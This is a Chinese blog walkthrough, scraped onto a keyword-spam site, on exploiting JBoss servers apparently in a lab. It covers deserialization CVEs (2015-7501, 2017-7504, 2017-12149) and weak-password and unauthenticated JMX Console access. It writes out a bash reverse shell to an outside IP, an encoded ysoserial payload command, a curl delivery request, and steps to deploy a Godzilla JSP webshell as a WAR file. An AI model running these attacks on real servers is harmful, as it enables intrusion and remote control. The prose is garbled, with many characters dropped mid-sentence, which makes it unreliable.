当前位置: 首页 > wzjs >正文

宁波外贸网站设计公司新沂网站优化

宁波外贸网站设计公司,新沂网站优化,2013网站挂马教程,响应式网站 尺寸CVE-2015-7501 Jboss JMXInvokerServlet 反序列化漏洞,这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利用Apache Commons Collections中的 Gadget 执⾏任意代码 访问地址 http://39…

CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞,这是典的JBoss反序列化漏洞JBoss/invoker/JMXInvokerServlet读取户传⼊的对我们利用Apache Commons Collections   Gadget 任意代

 访问地址 http://39.105.61.160:8080/invoker/JMXInvokerServlet1.返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

 下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

 将反弹shell进⾏base64编码

bash -i >& /dev/tcp/39.105.61.160/6666 0>&1

 监听6666端口

使用cmd

 java -jar "C:\Users\23215.呵呵\Documents\WeChat Files\wxid_1jxr0075qqd422\FileStorage\File\2025-03\ysoserial-all.jar" CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuNjEuMTYwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}">exp.ser

执行后在当前目录会生成一个exp.ser

再使用curl http://39.105.61.160:8080/invoker/JMXInvokerServlet --data-binary @exp.ser,那么就可以成功监听到端口

CVE-2017-7504

JBossMQ JMS 序列化漏洞,JBoss AS 4.x之前版本中JbossMQJMS over HTTP Invocation LayerHTTPServerILServlet.java序列化漏洞者可借助特制的序列化数据漏洞执任意代码执

访问漏洞地址,出现此页面说明存在漏洞

http://39.105.61.160:8080/jbossmq-httpil/HTTPServerILServlet

 在kali中使用jexboss工具

python3 jexboss.py -u http://39.105.61.160:8080

 

拿到shell 

​​​​​​​CVE-2017-12149

JBoss 5.x/6.x序列化漏洞,该漏洞为 Java序列化错在于 Jboss  HttpInvoker 件中的 ReadOnlyAccessFilter滤器中过滤器在没有进任何查的情况尝试将⾃客数据流进⾏反序列化⽽导了漏洞

使用jboss反序列化_CVE-2017-12149.jar

 ​​​​​​​Administration Console

Administration Console⻚⾯存在弱`admin:admin`陆后台war , getshell

 访问漏洞⻚⾯,出现404则存在漏洞

http://39.105.61.160:8080/invoker/readonly

点击Administration console

 使用弱口令登录,admin;vulhub

 点击Web Application (WAR)->Add New Web Application (WAR)

使用哥斯拉生成jsp木马,写入shell.jsp,压缩为shell.zip,将名字改为shell.war 

上传后通过http://39.105.61.160:8080/shell/shell.jsp访问,可使用哥斯拉连接就可以了

​​​​​​​低版本JMX  Console未授

JMX Console未授权访问Getshell,此漏洞JBoss/jmx-console/HtmlAdaptor路径对开放有任何身份致攻以进⼊到   jmx并在中执任何

点击JMX Console

使用弱口令登录,admin;admin

 

 登陆后找到jboss.deployment

 点击flavor=URL后找到void addURL(),第一个

将shell.war放到服务器上

 http://39.105.61.160/shell.war

点击Invoke, 出现下图代表成功

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 

版本JMX  Console未授

JMX Console访接点JBoss  JMX Console 接进JMX Console⻚⾯, 通过部war, getshell

点击JMX Console,账号admin;vulhub

 登陆后点击jboss.system->service=MainDeployer

 找到deloy部署http://39.105.61.160/shell.war,点击Invoke

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 

http://www.dtcms.com/wzjs/564250.html

相关文章:

  • 转塘有做网站的吗公司官网如何制作
  • 域控制网站访问网站建设先进个人自荐
  • 简单大方网站做网站需要啥
  • 网站制作公司珠海wordpress百度分享
  • 外贸网站建设定制开发wordpress怎么首页幻灯片
  • 新乡做网站哪家好呼图壁网站建设
  • 东凤镇做网站公司如何注册api key域名
  • 北京网站设计精选柚v米科技网站的栏目是什么
  • 网站源码 酷文化设计有限公司
  • 设计师常去网站适合做装饰公司的名字
  • 厦门网站建设外包网站建设的总结100字
  • 北京有多少家网站网站对于一个企业的优势
  • 电脑城网站开发需求分析主流门户网站
  • 网站的通栏怎么做哈尔滨网站建设公司oeminc
  • 现代示范校建设专题网站网页设计如何添加视频
  • 上海网站建设企业名录成都网红景点
  • 为什么我的电脑打开了第一个网站打开第二个网站就网络出问题了?建设招聘网站需要注册什么证
  • 微网站矩阵怎么做用微软雅黑做网站可以吗
  • 河北wap网站建设seo外包顾问
  • 四川杰新建设工程网站哪里有免费的wordpress主题
  • 网站开发定制推广杭州推荐黄的网站
  • wordpress 手机站目录自己做网站的意义
  • 套做网站网站软文怎么写
  • 上海网站推广哪家好科技网站有哪些
  • 手机版 演示 网站 触摸把wordpress集成进
  • 广州移动网站建设个人做外贸哪个平台好
  • 建个微商城网站多少钱想学设计怎么入门在家自己学
  • 旅游网站如何做推广京东商城企业网站建设分析
  • 合肥 做网站的雨花区基础网络营销方式
  • 轻松筹网站可以做吗公司的网站建设与维护论文